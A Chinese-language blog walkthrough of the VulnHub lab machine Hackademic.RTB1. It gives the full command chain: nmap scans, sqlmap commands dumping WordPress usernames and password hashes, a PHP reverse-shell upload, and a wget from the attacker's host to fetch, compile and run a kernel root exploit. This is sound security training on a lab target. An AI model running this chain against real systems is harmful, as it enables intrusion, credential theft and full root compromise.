渗透测试靶机：vulnhub-Hackademic.RTB1

benben Posted on Nov 23 2023

Web

## 一、开始渗透
### 1.1 获取一下kali的IP网卡信息和靶机ip

ifconfig
    arp-scan-l

![title](https://blog.benben.work/api/file/getImage?fileId=655e9e4c3f07ec063000001a)
### 1.2  **扫描靶机端口和服务**

- 扫描开放端口

nmap -p- 192.168.111.130

![title](https://blog.benben.work/api/file/getImage?fileId=655ea4933f07ec063000001e)
 - 确定端口服务和漏洞

nmap -sV -sC  192.168.111.130
    ![title](https://blog.benben.work/api/file/getImage?fileId=655ea5293f07ec063000001f)

### 1.3 漏洞利用
**1.3.1 先去访问一下80端口的网页，看看有些什么**
![title](https://blog.benben.work/api/file/getImage?fileId=655ea2913f07ec063000001b)
提示需要获取root权限和root目录下的key.txt，然后还发现有几个链接可以点击，点一下
![title](https://blog.benben.work/api/file/getImage?fileId=655ea3ae3f07ec063000001c)
下面两个链接都试一下手动注入，发现第二个存在sql漏洞。
![title](https://blog.benben.work/api/file/getImage?fileId=655ea40f3f07ec063000001d)
**1.3.2 使用sqlmap工具**

sqlmap -u "http://192.168.111.130/Hackademic_RTB1/?cat=1" --current-db --batch
    sqlmap -u "http://192.168.111.130/Hackademic_RTB1/?cat=1" -D wordpress --tables --batch
    sqlmap -u "http://192.168.111.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users --columns --batch
    sqlmap -u "http://192.168.111.130/Hackademic_RTB1/?cat=1" -D wordpress -T wp_users -C user_login,user_pass --dump --batch

![title](https://blog.benben.work/api/file/getImage?fileId=655ea5fc3f07ec0630000020)
![title](https://blog.benben.work/api/file/getImage?fileId=655ea6583f07ec0630000021)
![title](https://blog.benben.work/api/file/getImage?fileId=655ea6973f07ec0630000023)
![title](https://blog.benben.work/api/file/getImage?fileId=655ea73f3f07ec0630000024)
**1.3.3 使用目录扫描**

dirsearch -u "http://192.168.111.130/Hackademic_RTB1/"

发现有个wp-admin的子目录
![title](https://blog.benben.work/api/file/getImage?fileId=655ead1b3f07ec063000002e)
**1.3.4 寻找上传点**
发现GeorgeMiller用户有配置选项，开启文件上传，启用后可以看到右边多了个"upload"
![title](https://blog.benben.work/api/file/getImage?fileId=655ea8723f07ec0630000026)
**1.3.5 使用kali自带的php反弹shell**
修改为kali的ip
![title](https://blog.benben.work/api/file/getImage?fileId=655ea9b03f07ec0630000027)
上传文件后，开启监听，访问webshell
![title](https://blog.benben.work/api/file/getImage?fileId=655eaa5e3f07ec0630000028)
发现权限不够，想办法提权
**1.3.6 内核提权**
![title](https://blog.benben.work/api/file/getImage?fileId=655eaadf3f07ec0630000029)
![title](https://blog.benben.work/api/file/getImage?fileId=655eab223f07ec063000002a)
选定一个然后开启apache服务
![title](https://blog.benben.work/api/file/getImage?fileId=655eabfe3f07ec063000002c)
然后回到原本监听着的webshell

cd /tmp
    wget http://172.16.95.133/15285.c
    gcc -o exp 15285.c
    chmod +x exp
    ./exp

获取root下的key.txt
![title](https://blog.benben.work/api/file/getImage?fileId=655eacf23f07ec063000002d)

赠人玫瑰，手留余香